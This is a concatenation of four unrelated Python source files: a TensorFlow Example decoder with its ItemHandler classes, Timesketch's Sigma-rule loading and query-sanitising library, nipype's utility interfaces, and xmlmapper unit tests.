keys.extend(shape_keys) super(Tensor, self).__init__(keys) def tensors_to_item(self, keys_to_tensors): tensor = keys_to_tensors[self._tensor_key] shape = self._shape if self._shape_keys: shape_dims = [] for k in self._shape_keys: shape_dim = keys_to_tensors[k] if isinstance(shape_dim, sparse_tensor.SparseTensor): shape_dim = sparse_ops.sparse_tensor_to_dense(shape_dim) shape_dims.append(shape_dim) shape = array_ops.reshape(array_ops.stack(shape_dims), [-1]) if isinstance(tensor, sparse_tensor.SparseTensor): if shape is not None: tensor = sparse_ops.sparse_reshape(tensor, shape) tensor = sparse_ops.sparse_tensor_to_dense(tensor, self._default_value) else: if shape is not None: tensor = array_ops.reshape(tensor, shape) return tensor class SparseTensor(ItemHandler): """An ItemHandler for SparseTensors.""" def __init__(self, indices_key=None, values_key=None, shape_key=None, shape=None, densify=False, default_value=0): """Initializes the Tensor handler. Args: indices_key: the name of the TF-Example feature that contains the ids. Defaults to 'indices'. values_key: the name of the TF-Example feature that contains the values. Defaults to 'values'. shape_key: the name of the TF-Example feature that contains the shape. If provided it would be used. shape: the output shape of the SparseTensor. If `shape_key` is not provided this `shape` would be used. densify: whether to convert the SparseTensor into a dense Tensor. default_value: Scalar value to set when making dense for indices not specified in the `SparseTensor`. """ indices_key = indices_key or 'indices' values_key = values_key or 'values' self._indices_key = indices_key self._values_key = values_key self._shape_key = shape_key self._shape = shape self._densify = densify self._default_value = default_value keys = [indices_key, values_key] if shape_key: keys.append(shape_key) super(SparseTensor, self).__init__(keys) def tensors_to_item(self, keys_to_tensors): indices = keys_to_tensors[self._indices_key] values = keys_to_tensors[self._values_key] if self._shape_key: shape = keys_to_tensors[self._shape_key] if isinstance(shape, sparse_tensor.SparseTensor): shape = sparse_ops.sparse_tensor_to_dense(shape) elif self._shape: shape = self._shape else: shape = indices.dense_shape indices_shape = array_ops.shape(indices.indices) rank = indices_shape[1] ids = math_ops.to_int64(indices.values) indices_columns_to_preserve = array_ops.slice( indices.indices, [0, 0], array_ops.stack([-1, rank - 1])) new_indices = array_ops.concat( [indices_columns_to_preserve, array_ops.reshape(ids, [-1, 1])], 1) tensor = sparse_tensor.SparseTensor(new_indices, values.values, shape) if self._densify: tensor = sparse_ops.sparse_tensor_to_dense(tensor, self._default_value) return tensor class Image(ItemHandler): """An ItemHandler that decodes a parsed Tensor as an image.""" def __init__(self, image_key=None, format_key=None, shape=None, channels=3, dtype=dtypes.uint8, repeated=False): """Initializes the image. Args: image_key: the name of the TF-Example feature in which the encoded image is stored. format_key: the name of the TF-Example feature in which the image format is stored. shape: the output shape of the image as 1-D `Tensor` [height, width, channels]. If provided, the image is reshaped accordingly. If left as None, no reshaping is done. A shape should be supplied only if all the stored images have the same shape. channels: the number of channels in the image. dtype: images will be decoded at this bit depth. Different formats support different bit depths. See tf.image.decode_image, tf.decode_raw, repeated: if False, decodes a single image. If True, decodes a variable number of image strings from a 1D tensor of strings. """ if not image_key: image_key = 'image/encoded' if not format_key: format_key = 'image/format' super(Image, self).__init__([image_key, format_key]) self._image_key = image_key self._format_key = format_key self._shape = shape self._channels = channels self._dtype = dtype self._repeated = repeated def tensors_to_item(self, keys_to_tensors): """See base class.""" image_buffer = keys_to_tensors[self._image_key] image_format = keys_to_tensors[self._format_key] if self._repeated: return functional_ops.map_fn(lambda x: self._decode(x, image_format), image_buffer, dtype=self._dtype) else: return self._decode(image_buffer, image_format) def _decode(self, image_buffer, image_format): """Decodes the image buffer. Args: image_buffer: The tensor representing the encoded image tensor. image_format: The image format for the image in `image_buffer`. If image format is `raw`, all images are expected to be in this format, otherwise this op can decode a mix of `jpg` and `png` formats. Returns: A tensor that represents decoded image of self._shape, or (?, ?, self._channels) if self._shape is not specified. """ def decode_image(): """Decodes a png or jpg based on the headers.""" return image_ops.decode_image(image_buffer, self._channels) def decode_raw(): """Decodes a raw image.""" return parsing_ops.decode_raw(image_buffer, out_type=self._dtype) pred_fn_pairs = { math_ops.logical_or( math_ops.equal(image_format, 'raw'), math_ops.equal(image_format, 'RAW')): decode_raw, } image = control_flow_ops.case( pred_fn_pairs, default=decode_image, exclusive=True) image.set_shape([None, None, self._channels]) if self._shape is not None: image = array_ops.reshape(image, self._shape) return image class TFExampleDecoder(data_decoder.DataDecoder): """A decoder for TensorFlow Examples. Decoding Example proto buffers is comprised of two stages: (1) Example parsing and (2) tensor manipulation. In the first stage, the tf.parse_example function is called with a list of FixedLenFeatures and SparseLenFeatures. These instances tell TF how to parse the example. The output of this stage is a set of tensors. In the second stage, the resulting tensors are manipulated to provide the requested 'item' tensors. To perform this decoding operation, an ExampleDecoder is given a list of ItemHandlers. Each ItemHandler indicates the set of features for stage 1 and contains the instructions for post_processing its tensors for stage 2. """ def __init__(self, keys_to_features, items_to_handlers): """Constructs the decoder. Args: keys_to_features: a dictionary from TF-Example keys to either tf.VarLenFeature or tf.FixedLenFeature instances. See tensorflow's parsing_ops.py. items_to_handlers: a dictionary from items (strings) to ItemHandler instances. Note that the ItemHandler's are provided the keys that they use to return the final item Tensors. """ self._keys_to_features = keys_to_features self._items_to_handlers = items_to_handlers def list_items(self): """See base class.""" return list(self._items_to_handlers.keys()) def decode(self, serialized_example, items=None): """Decodes the given serialized TF-example. Args: serialized_example: a serialized TF-example tensor. items: the list of items to decode. These must be a subset of the item keys in self._items_to_handlers. If `items` is left as None, then all of the items in self._items_to_handlers are decoded. Returns: the decoded items, a list of tensor. """ example = parsing_ops.parse_single_example(serialized_example, self._keys_to_features) # Reshape non-sparse elements just once, adding the reshape ops in # deterministic order. for k in sorted(self._keys_to_features): v = self._keys_to_features[k] if isinstance(v, parsing_ops.FixedLenFeature): example[k] = array_ops.reshape(example[k], v.shape) if not items: items = self._items_to_handlers.keys() outputs = [] for item in items: handler = self._items_to_handlers[item] keys_to_tensors = {key: example[key] for key in handler.keys} outputs.append(handler.tensors_to_item(keys_to_tensors)) return outputs
# Copyright 2020 Google Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Timesketch Sigma lib functions.""" import re import os import codecs import csv import logging from datetime import datetime import yaml import pandas as pd from flask import current_app import sigma.configuration as sigma_configuration from sigma.backends import elasticsearch as sigma_es from sigma.parser import collection as sigma_collection from sigma.parser import exceptions as sigma_exceptions from sigma.config.exceptions import SigmaConfigParseError logger = logging.getLogger('timesketch.lib.sigma') def get_sigma_config_file(config_file=None): """Get a sigma.configuration.SigmaConfiguration object. Args: config_file: Optional path to a config file Returns: A sigma.configuration.SigmaConfiguration object Raises: ValueError: If SIGMA_CONFIG is not found in the config file. or the Sigma config file is not readabale. SigmaConfigParseError: If config file could not be parsed. """ if config_file: config_file_path = config_file else: config_file_path = current_app.config.get( 'SIGMA_CONFIG', './data/sigma_config.yaml' ) if not config_file_path: raise ValueError('No config_file_path set via param or config file') if not os.path.isfile(config_file_path): raise ValueError( 'Unable to open: [{0:s}], does not exist.'.format(config_file_path) ) if not os.access(config_file_path, os.R_OK): raise ValueError( 'Unable to open file: [{0:s}], cannot open it for ' 'read, please check permissions.'.format(config_file_path) ) with open(config_file_path, 'r', encoding='utf-8') as config_file_read: sigma_config_file = config_file_read.read() try: sigma_config = sigma_configuration.SigmaConfiguration( sigma_config_file ) except SigmaConfigParseError: logger.error('Parsing error with {0:s}'.format(sigma_config_file)) raise return sigma_config def get_sigma_rules_path(): """Get Sigma rules paths. Returns: A list of strings to the Sigma rules Raises: ValueError: If SIGMA_RULES_FOLDERS is not found in the config file. or the folders are not readabale. """ try: rules_path = current_app.config.get('SIGMA_RULES_FOLDERS', []) except RuntimeError as e: raise ValueError('SIGMA_RULES_FOLDERS not found in config file') from e if not rules_path: raise ValueError('SIGMA_RULES_FOLDERS not found in config file') for folder in rules_path: if not os.path.isdir(folder): raise ValueError( 'Unable to open dir: [{0:s}], it does not exist.'.format( folder ) ) if not os.access(folder, os.R_OK): raise ValueError( 'Unable to open dir: [{0:s}], cannot open it for ' 'read, please check permissions.'.format(folder) ) return rules_path def get_sigma_rules(rule_folder, sigma_config=None): """Returns the Sigma rules for a folder including subfolders. Args: rule_folder: folder to be checked for rules sigma_config: optional argument to pass a sigma.configuration.SigmaConfiguration object Returns: A array of Sigma rules as JSON Raises: ValueError: If SIGMA_RULES_FOLDERS is not found in the config file. or the folders are not readabale. """ return_array = [] blocklist_path = None ignore = get_sigma_blocklist(blocklist_path) ignore_list = list(ignore['path'].unique()) for dirpath, dirnames, files in os.walk(rule_folder): if 'deprecated' in [x.lower() for x in dirnames]: dirnames.remove('deprecated') for rule_filename in files: if rule_filename.lower().endswith('.yml'): # if a sub dir is found, do not try to parse it. if os.path.isdir(os.path.join(dirpath, rule_filename)): continue rule_file_path = os.path.join(dirpath, rule_filename) if any(x in rule_file_path for x in ignore_list): continue parsed_rule = get_sigma_rule(rule_file_path, sigma_config) if parsed_rule: return_array.append(parsed_rule) return return_array def get_all_sigma_rules(): """Returns all Sigma rules Returns: A array of Sigma rules Raises: ValueError: If SIGMA_RULES_FOLDERS is not found in the config file. or the folders are not readabale. """ sigma_rules = [] rules_paths = get_sigma_rules_path() for folder in rules_paths: sigma_rules.extend(get_sigma_rules(folder)) return sigma_rules def get_sigma_rule(filepath, sigma_config=None): """Returns a JSON represenation for a rule Args: filepath: path to the sigma rule to be parsed sigma_config: optional argument to pass a sigma.configuration.SigmaConfiguration object Returns: Json representation of the parsed rule Raises: ValueError: Parsing error IsADirectoryError: If a directory is passed as filepath """ try: if isinstance(sigma_config, sigma_configuration.SigmaConfiguration): sigma_conf_obj = sigma_config elif isinstance(sigma_config, str): sigma_conf_obj = get_sigma_config_file(sigma_config) else: sigma_conf_obj = get_sigma_config_file() except ValueError as e: logger.error('Problem reading the Sigma config', exc_info=True) raise ValueError('Problem reading the Sigma config') from e sigma_backend = sigma_es.ElasticsearchQuerystringBackend( sigma_conf_obj, {} ) try: sigma_rules_paths = get_sigma_rules_path() except ValueError: sigma_rules_paths = None if not filepath.lower().endswith('.yml'): raise ValueError(f'{filepath} does not end with .yml') # if a sub dir is found, nothing can be parsed if os.path.isdir(filepath): raise IsADirectoryError(f'{filepath} is a directory - must be a file') abs_path = os.path.abspath(filepath) with codecs.open( abs_path, 'r', encoding='utf-8', errors='replace' ) as file: try: rule_return = {} rule_yaml_data = yaml.safe_load_all(file.read()) for doc in rule_yaml_data: rule_return.update(doc) parser = sigma_collection.SigmaCollectionParser( yaml.safe_dump(doc), sigma_conf_obj, None ) parsed_sigma_rules = parser.generate(sigma_backend) except NotImplementedError as exception: logger.error('Error rule {0:s}: {1!s}'.format(abs_path, exception)) add_problematic_rule( filepath, doc.get('id'), 'Part of the rule not supported in TS' ) return None except sigma_exceptions.SigmaParseError as exception: logger.error( 'Sigma parsing error rule in file {0:s}: {1!s}'.format( abs_path, exception ) ) add_problematic_rule( filepath, doc.get('id'), 'sigma_exceptions.SigmaParseError' ) return None except yaml.parser.ParserError as exception: logger.error( 'Yaml parsing error rule in file {0:s}: {1!s}'.format( abs_path, exception ) ) add_problematic_rule(filepath, None, 'yaml.parser.ParserError') return None sigma_es_query = '' for sigma_rule in parsed_sigma_rules: sigma_es_query = _sanitize_query(sigma_rule) rule_return.update({'es_query': sigma_es_query}) rule_return.update({'file_name': os.path.basename(filepath)}) # in case multiple folders are in the config, need to remove them if sigma_rules_paths: for rule_path in sigma_rules_paths: file_relpath = os.path.relpath(filepath, rule_path) else: file_relpath = 'N/A' rule_return.update({'file_relpath': file_relpath}) return rule_return def _sanitize_query(sigma_rule_query: str) -> str: """Returns a sanitized query Args: sigma_rule_query: path to the sigma rule to be parsed Returns: String of a cleaned string """ # TODO: Investigate how to handle .keyword # fields in Sigma. # https://github.com/google/timesketch/issues/1199#issuecomment-639475885 sigma_rule_query = sigma_rule_query.replace('.keyword:', ':') sigma_rule_query = sigma_rule_query.replace('\\ ', ' ') sigma_rule_query = sigma_rule_query.replace('\\:', ':') sigma_rule_query = sigma_rule_query.replace('\\-', '-') sigma_rule_query = sigma_rule_query.replace('*\\\\', ' *') sigma_rule_query = sigma_rule_query.replace('::', r'\:\:') # TODO: Improve the whitespace handling # https://github.com/google/timesketch/issues/2007 # check if there is a ' * ' # if one is found split it up into elements seperated by space # and go backwards to the next star sigma_rule_query = sigma_rule_query.replace(' * OR', ' " OR') sigma_rule_query = sigma_rule_query.replace(' * AND', ' " AND') sigma_rule_query = sigma_rule_query.replace('OR * ', 'OR " ') sigma_rule_query = sigma_rule_query.replace('AND * ', 'AND " ') sigma_rule_query = sigma_rule_query.replace('(* ', '(" ') sigma_rule_query = sigma_rule_query.replace(' *)', ' ")') sigma_rule_query = sigma_rule_query.replace('*)', '")') sigma_rule_query = sigma_rule_query.replace('(*', '("') sigma_rule_query = sigma_rule_query.replace( r'\*:', '' ) # removes wildcard at the beginning of a rule es_query elements = re.split(r'\s+', sigma_rule_query) san = [] for el in elements: if el.count('*') == 1: # indicates a string that had a space before with only one star san.append(el.replace('*', '"')) else: san.append(el) sigma_rule_query = ' '.join(san) # above method might create strings that have '' in them, workaround: sigma_rule_query = sigma_rule_query.replace('""', '"') return sigma_rule_query def get_sigma_blocklist(blocklist_path=None): """Get a dataframe of sigma rules to ignore. This includes filenames, paths, ids. Args: blocklist_path(str): Path to a blocklist file. The default value is None Returns: Pandas dataframe with blocklist Raises: ValueError: Sigma blocklist file is not readabale. """ return pd.read_csv(get_sigma_blocklist_path(blocklist_path)) def get_sigma_blocklist_path(blocklist_path=None): """Checks and returns the Sigma blocklist path. This includes filenames, paths, ids. Args: blocklist_path(str): Path to a blocklist file. The default value is './data/sigma_blocklist.csv' Returns: Sigma Blocklist path Raises: ValueError: Sigma blocklist file is not readabale. """ logger.error(blocklist_path) if not blocklist_path or blocklist_path == '': blocklist_path = current_app.config.get( 'SIGMA_BLOCKLIST_CSV', './data/sigma_blocklist.csv' ) if not blocklist_path: raise ValueError('No blocklist_file_path set via param or config file') if not os.path.isfile(blocklist_path): raise ValueError( 'Unable to open file: [{0:s}] does not exist'.format( blocklist_path ) ) if not os.access(blocklist_path, os.R_OK): raise ValueError( 'Unable to open file: [{0:s}], cannot open it for ' 'read, please check permissions.'.format(blocklist_path) ) return blocklist_path def add_problematic_rule(filepath, rule_uuid=None, reason=None): """Adds a problematic rule to the blocklist.csv. Args: filepath: path to the sigma rule that caused problems rule_uuid: rule uuid reason: optional reason why file is moved """ blocklist_file_path = get_sigma_blocklist_path() # we only want to store the relative paths in the blocklist file try: sigma_rules_paths = get_sigma_rules_path() except ValueError: sigma_rules_paths = None if sigma_rules_paths: for rule_path in sigma_rules_paths: file_relpath = os.path.relpath(filepath, rule_path) # path,bad,reason,last_ckecked,rule_id fields = [ file_relpath, 'bad', reason, datetime.now().strftime('%Y-%m-%d'), rule_uuid, ] with open(blocklist_file_path, 'a', encoding='utf-8') as f: writer = csv.writer(f) writer.writerow(fields) def get_sigma_rule_by_text(rule_text, sigma_config=None): """Returns a JSON represenation for a rule Args: rule_text: Text of the sigma rule to be parsed sigma_config: config file object Returns: Json representation of the parsed rule Raises: sigma_exceptions.SigmaParseError: Issue with parsing the given rule yaml.parser.ParserError: Not a correct YAML text provided NotImplementedError: A feature in the provided Sigma rule is not implemented in Sigma for Timesketch """ try: if isinstance(sigma_config, sigma_configuration.SigmaConfiguration): sigma_conf_obj = sigma_config elif isinstance(sigma_config, str): sigma_conf_obj = get_sigma_config_file(sigma_config) else: sigma_conf_obj = get_sigma_config_file() except ValueError as e: logger.error('Problem reading the Sigma config', exc_info=True) raise ValueError('Problem reading the Sigma config') from e sigma_backend = sigma_es.ElasticsearchQuerystringBackend( sigma_conf_obj, {} ) rule_return = {} # TODO check if input validation is needed / useful. try: rule_yaml_data = yaml.safe_load_all(rule_text) for doc in rule_yaml_data: parser = sigma_collection.SigmaCollectionParser( str(doc), sigma_conf_obj, None ) parsed_sigma_rules = parser.generate(sigma_backend) rule_return.update(doc) except NotImplementedError as exception: logger.error('Error generating rule {0!s}'.format(exception)) raise except sigma_exceptions.SigmaParseError as exception: logger.error('Sigma parsing error rule {0!s}'.format(exception)) raise except yaml.parser.ParserError as exception: logger.error('Yaml parsing error rule {0!s}'.format(exception)) raise sigma_es_query = '' for sigma_rule in parsed_sigma_rules: sigma_es_query = _sanitize_query(sigma_rule) rule_return.update({'es_query': sigma_es_query}) rule_return.update({'file_name': 'N/A'}) rule_return.update({'file_relpath': 'N/A'}) return rule_return
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*- # vi: set ft=python sts=4 ts=4 sw=4 et: import os import re import numpy as np import nibabel as nb from nipype.utils.filemanip import (filename_to_list, copyfile, split_filename) from nipype.interfaces.base import (traits, TraitedSpec, DynamicTraitedSpec, File, Undefined, isdefined, OutputMultiPath, InputMultiPath, BaseInterface, BaseInterfaceInputSpec) from nipype.interfaces.io import IOBase, add_traits from nipype.testing import assert_equal from nipype.utils.misc import getsource, create_function_from_source, dumps class IdentityInterface(IOBase): """Basic interface class generates identity mappings Examples -------- >>> from nipype.interfaces.utility import IdentityInterface >>> ii = IdentityInterface(fields=['a', 'b'], mandatory_inputs=False) >>> ii.inputs.a <undefined> >>> ii.inputs.a = 'foo' >>> out = ii._outputs() >>> out.a <undefined> >>> out = ii.run() >>> out.outputs.a 'foo' >>> ii2 = IdentityInterface(fields=['a', 'b'], mandatory_inputs=True) >>> ii2.inputs.a = 'foo' >>> out = ii2.run() # doctest: +SKIP ValueError: IdentityInterface requires a value for input 'b' because it was listed in 'fields' Interface IdentityInterface failed to run. """ input_spec = DynamicTraitedSpec output_spec = DynamicTraitedSpec def __init__(self, fields=None, mandatory_inputs=True, **inputs): super(IdentityInterface, self).__init__(**inputs) if fields is None or not fields: raise Exception('Identity Interface fields must be a non-empty list') self._fields = fields self._mandatory_inputs = mandatory_inputs add_traits(self.inputs, fields) def _add_output_traits(self, base): undefined_traits = {} for key in self._fields: base.add_trait(key, traits.Any) undefined_traits[key] = Undefined base.trait_set(trait_change_notify=False, **undefined_traits) return base def _list_outputs(self): #manual mandatory inputs check if self._fields and self._mandatory_inputs: for key in self._fields: value = getattr(self.inputs, key) if not isdefined(value): msg = "%s requires a value for input '%s' because it was listed in 'fields'. \ You can turn off mandatory inputs checking by passing mandatory_inputs = False to the constructor." % \ (self.__class__.__name__, key) raise ValueError(msg) outputs = self._outputs().get() for key in self._fields: val = getattr(self.inputs, key) if isdefined(val): outputs[key] = val return outputs class MergeInputSpec(DynamicTraitedSpec, BaseInterfaceInputSpec): axis = traits.Enum('vstack', 'hstack', usedefault=True, desc='direction in which to merge, hstack requires same number of elements in each input') class MergeOutputSpec(TraitedSpec): out = traits.List(desc='Merged output') class Merge(IOBase): """Basic interface class to merge inputs into a single list Examples -------- >>> from nipype.interfaces.utility import Merge >>> mi = Merge(3) >>> mi.inputs.in1 = 1 >>> mi.inputs.in2 = [2, 5] >>> mi.inputs.in3 = 3 >>> out = mi.run() >>> out.outputs.out [1, 2, 5, 3] """ input_spec = MergeInputSpec output_spec = MergeOutputSpec def __init__(self, numinputs=0, **inputs): super(Merge, self).__init__(**inputs) self.numinputs = numinputs add_traits(self.inputs, ['in%d' % (i + 1) for i in range(numinputs)]) def _list_outputs(self): outputs = self._outputs().get() out = [] if self.inputs.axis == 'vstack': for idx in range(self.numinputs): value = getattr(self.inputs, 'in%d' % (idx + 1)) if isdefined(value): if isinstance(value, list): out.extend(value) else: out.append(value) else: for i in range(len(filename_to_list(self.inputs.in1))): out.insert(i, []) for j in range(self.numinputs): out[i].append(filename_to_list(getattr(self.inputs, 'in%d' % (j + 1)))[i]) if out: outputs['out'] = out return outputs class RenameInputSpec(DynamicTraitedSpec): in_file = File(exists=True, mandatory=True, desc="file to rename") keep_ext = traits.Bool(desc="Keep in_file extension, replace non-extension component of name") format_string = traits.String(mandatory=True, desc="Python formatting string for output template") parse_string = traits.String(desc="Python regexp parse string to define replacement inputs") class RenameOutputSpec(TraitedSpec): out_file = traits.File(exists=True, desc="softlink to original file with new name") class Rename(IOBase): """Change the name of a file based on a mapped format string. To use additional inputs that will be defined at run-time, the class constructor must be called with the format template, and the fields identified will become inputs to the interface. Additionally, you may set the parse_string input, which will be run over the input filename with a regular expressions search, and will fill in additional input fields from matched groups. Fields set with inputs have precedence over fields filled in with the regexp match. Examples -------- >>> from nipype.interfaces.utility import Rename >>> rename1 = Rename() >>> rename1.inputs.in_file = "zstat1.nii.gz" >>> rename1.inputs.format_string = "Faces-Scenes.nii.gz" >>> res = rename1.run() # doctest: +SKIP >>> print res.outputs.out_file # doctest: +SKIP 'Faces-Scenes.nii.gz" # doctest: +SKIP >>> rename2 = Rename(format_string="%(subject_id)s_func_run%(run)02d") >>> rename2.inputs.in_file = "functional.nii" >>> rename2.inputs.keep_ext = True >>> rename2.inputs.subject_id = "subj_201" >>> rename2.inputs.run = 2 >>> res = rename2.run() # doctest: +SKIP >>> print res.outputs.out_file # doctest: +SKIP 'subj_201_func_run02.nii' # doctest: +SKIP >>> rename3 = Rename(format_string="%(subject_id)s_%(seq)s_run%(run)02d.nii") >>> rename3.inputs.in_file = "func_epi_1_1.nii" >>> rename3.inputs.parse_string = "func_(?P<seq>\w*)_.*" >>> rename3.inputs.subject_id = "subj_201" >>> rename3.inputs.run = 2 >>> res = rename3.run() # doctest: +SKIP >>> print res.outputs.out_file # doctest: +SKIP 'subj_201_epi_run02.nii' # doctest: +SKIP """ input_spec = RenameInputSpec output_spec = RenameOutputSpec def __init__(self, format_string=None, **inputs): super(Rename, self).__init__(**inputs) if format_string is not None: self.inputs.format_string = format_string self.fmt_fields = re.findall(r"%\((.+?)\)", format_string) add_traits(self.inputs, self.fmt_fields) else: self.fmt_fields = [] def _rename(self): fmt_dict = dict() if isdefined(self.inputs.parse_string): m = re.search(self.inputs.parse_string, os.path.split(self.inputs.in_file)[1]) if m: fmt_dict.update(m.groupdict()) for field in self.fmt_fields: val = getattr(self.inputs, field) if isdefined(val): fmt_dict[field] = getattr(self.inputs, field) if self.inputs.keep_ext: fmt_string = "".join([self.inputs.format_string, split_filename(self.inputs.in_file)[2]]) else: fmt_string = self.inputs.format_string return fmt_string % fmt_dict def _run_interface(self, runtime): runtime.returncode = 0 _ = copyfile(self.inputs.in_file, os.path.join(os.getcwd(), self._rename())) return runtime def _list_outputs(self): outputs = self._outputs().get() outputs["out_file"] = os.path.join(os.getcwd(), self._rename()) return outputs class SplitInputSpec(BaseInterfaceInputSpec): inlist = traits.List(traits.Any, mandatory=True, desc='list of values to split') splits = traits.List(traits.Int, mandatory=True, desc='Number of outputs in each split - should add to number of inputs') class Split(IOBase): """Basic interface class to split lists into multiple outputs Examples -------- >>> from nipype.interfaces.utility import Split >>> sp = Split() >>> _ = sp.inputs.set(inlist=[1, 2, 3], splits=[2, 1]) >>> out = sp.run() >>> out.outputs.out1 [1, 2] """ input_spec = SplitInputSpec output_spec = DynamicTraitedSpec def _add_output_traits(self, base): undefined_traits = {} for i in range(len(self.inputs.splits)): key = 'out%d' % (i + 1) base.add_trait(key, traits.Any) undefined_traits[key] = Undefined base.trait_set(trait_change_notify=False, **undefined_traits) return base def _list_outputs(self): outputs = self._outputs().get() if isdefined(self.inputs.splits): if sum(self.inputs.splits) != len(self.inputs.inlist): raise RuntimeError('sum of splits != num of list elements') splits = [0] splits.extend(self.inputs.splits) splits = np.cumsum(splits) for i in range(len(splits) - 1): outputs['out%d' % (i + 1)] = np.array(self.inputs.inlist)[splits[i]:splits[i + 1]].tolist() return outputs class SelectInputSpec(BaseInterfaceInputSpec): inlist = InputMultiPath(traits.Any, mandatory=True, desc='list of values to choose from') index = InputMultiPath(traits.Int, mandatory=True, desc='0-based indices of values to choose') class SelectOutputSpec(TraitedSpec): out = OutputMultiPath(traits.Any, desc='list of selected values') class Select(IOBase): """Basic interface class to select specific elements from a list Examples -------- >>> from nipype.interfaces.utility import Select >>> sl = Select() >>> _ = sl.inputs.set(inlist=[1, 2, 3, 4, 5], index=[3]) >>> out = sl.run() >>> out.outputs.out 4 >>> _ = sl.inputs.set(inlist=[1, 2, 3, 4, 5], index=[3, 4]) >>> out = sl.run() >>> out.outputs.out [4, 5] """ input_spec = SelectInputSpec output_spec = SelectOutputSpec def _list_outputs(self): outputs = self._outputs().get() out = np.array(self.inputs.inlist)[np.array(self.inputs.index)].tolist() outputs['out'] = out return outputs class FunctionInputSpec(DynamicTraitedSpec, BaseInterfaceInputSpec): function_str = traits.Str(mandatory=True, desc='code for function') class Function(IOBase): """Runs arbitrary function as an interface Examples -------- >>> func = 'def func(arg1, arg2=5): return arg1 + arg2' >>> fi = Function(input_names=['arg1', 'arg2'], output_names=['out']) >>> fi.inputs.function_str = func >>> res = fi.run(arg1=1) >>> res.outputs.out 6 """ input_spec = FunctionInputSpec output_spec = DynamicTraitedSpec def __init__(self, input_names, output_names, function=None, **inputs): """ Parameters ---------- input_names: single str or list names corresponding to function inputs output_names: single str or list names corresponding to function outputs. has to match the number of outputs """ super(Function, self).__init__(**inputs) if function: if hasattr(function, '__call__'): try: self.inputs.function_str = getsource(function) except IOError: raise Exception('Interface Function does not accept ' \ 'function objects defined interactively in a python session') elif isinstance(function, str): self.inputs.function_str = function else: raise Exception('Unknown type of function') self.inputs.on_trait_change(self._set_function_string, 'function_str') self._input_names = filename_to_list(input_names) self._output_names = filename_to_list(output_names) add_traits(self.inputs, [name for name in self._input_names]) self._out = {} for name in self._output_names: self._out[name] = None def _set_function_string(self, obj, name, old, new): if name == 'function_str': if hasattr(new, '__call__'): function_source = getsource(new) elif isinstance(new, str): function_source = dumps(new) self.inputs.trait_set(trait_change_notify=False, **{'%s' % name: function_source}) def _add_output_traits(self, base): undefined_traits = {} for key in self._output_names: base.add_trait(key, traits.Any) undefined_traits[key] = Undefined base.trait_set(trait_change_notify=False, **undefined_traits) return base def _run_interface(self, runtime): function_handle = create_function_from_source(self.inputs.function_str) args = {} for name in self._input_names: value = getattr(self.inputs, name) if isdefined(value): args[name] = value out = function_handle(**args) if len(self._output_names) == 1: self._out[self._output_names[0]] = out else: if isinstance(out, tuple) and (len(out) != len(self._output_names)): raise RuntimeError('Mismatch in number of expected outputs') else: for idx, name in enumerate(self._output_names): self._out[name] = out[idx] return runtime def _list_outputs(self): outputs = self._outputs().get() for key in self._output_names: outputs[key] = self._out[key] return outputs class AssertEqualInputSpec(BaseInterfaceInputSpec): volume1 = File(exists=True, mandatory=True) volume2 = File(exists=True, mandatory=True) class AssertEqual(BaseInterface): input_spec = AssertEqualInputSpec def _run_interface(self, runtime): data1 = nb.load(self.inputs.volume1).get_data() data2 = nb.load(self.inputs.volume2).get_data() assert_equal(data1, data2) return runtime
import six if six.PY2: import mock else: from unittest import mock import unittest from lxml import etree import should_be.all # noqa import xmlmapper as mp from xmlmapper import xml_helpers as xh class SampleModel(mp.Model): ROOT_ELEM = 'some_elem' name = mp.NodeValue('name') class TestModel(unittest.TestCase): def test_load_from_etree(self): xml = etree.Element('some_elem') name_elem = etree.Element('name') name_elem.text = 'hi' xml.append(name_elem) model = SampleModel(xml) model._etree.shouldnt_be_none() model.name.should_be('hi') def test_load_from_string(self): xml = "<some_elem><name>hi</name></some_elem>" model = SampleModel(xml) model._etree.shouldnt_be_none() model.name.should_be('hi') def test_load_from_none(self): model = SampleModel() model._etree.shouldnt_be_none() model._etree.tag.should_be('some_elem') def test_raises_when_root_elem_doesnt_match(self): xml = "<some_other_elem><name>hi</name></some_other_elem>" def make_sample_model(xml): return SampleModel(xml) make_sample_model.should_raise(ValueError, xml) def test_to_string(self): model = SampleModel() model.name = 'some name' xml_str = str(model) if six.PY2: xml_str2 = model.to_xml() xml_str3 = unicode(model) xml_str3.should_be(xml_str2.decode('ascii')) else: xml_str2 = model.to_xml(encoding=str) xml_str.should_be(xml_str2) xml = etree.fromstring(xml_str) name_elem = xml.find('name') name_elem.shouldnt_be_none() name_elem.text.should_be('some name') def test_to_bytes(self): model = SampleModel() model.name = 'some name' xml_str = bytes(model) xml_str2 = model.to_xml() xml_str.should_be(xml_str2) xml = etree.fromstring(xml_str) name_elem = xml.find('name') name_elem.shouldnt_be_none() name_elem.text.should_be('some name') class TestElemUtils(unittest.TestCase): def test_make_elem_plain(self): elem = mp.make_elem('some_elem') elem.tag.should_be('some_elem') def test_make_elem_with_attr_name(self): elem = mp.make_elem('some_elem[@some_attr]') elem.tag.should_be('some_elem') elem.get('some_attr').should_be_empty() def test_make_elem_with_attr_full(self): elem = mp.make_elem('some_elem[@some_attr="some val"]') elem.tag.should_be('some_elem') elem.get('some_attr').should_be('some val') def test_make_elem_multiple_attrs(self): elem = mp.make_elem('some_elem[@some_attr="some val"][@other_attr]') elem.tag.should_be('some_elem') elem.get('some_attr').should_be('some val') elem.get('other_attr').should_be_empty() def test_make_path_already_exists(self): root = etree.Element('root') t1 = etree.Element('tag1') t2 = etree.Element('tag2') t3 = etree.Element('tag3') root.append(t1) t1.append(t2) t2.append(t3) with mock.patch.object(mp, 'make_elem') as make_patch: res = mp.make_path('tag1/tag2/tag3', root) make_patch.called.should_be_false() res.tag.should_be('tag3') def test_make_path_parent_exists(self): root = etree.Element('root') t1 = etree.Element('tag1') t2 = etree.Element('tag2') root.append(t1) t1.append(t2) res = mp.make_path('tag1/tag2/tag3', root) res.tag.should_be('tag3') t2.find('tag3').shouldnt_be_none() def test_make_path_nothing_exists(self): root = etree.Element('root') res = mp.make_path('tag1/tag2/tag3', root) res.shouldnt_be_none() res.tag.should_be('tag3') 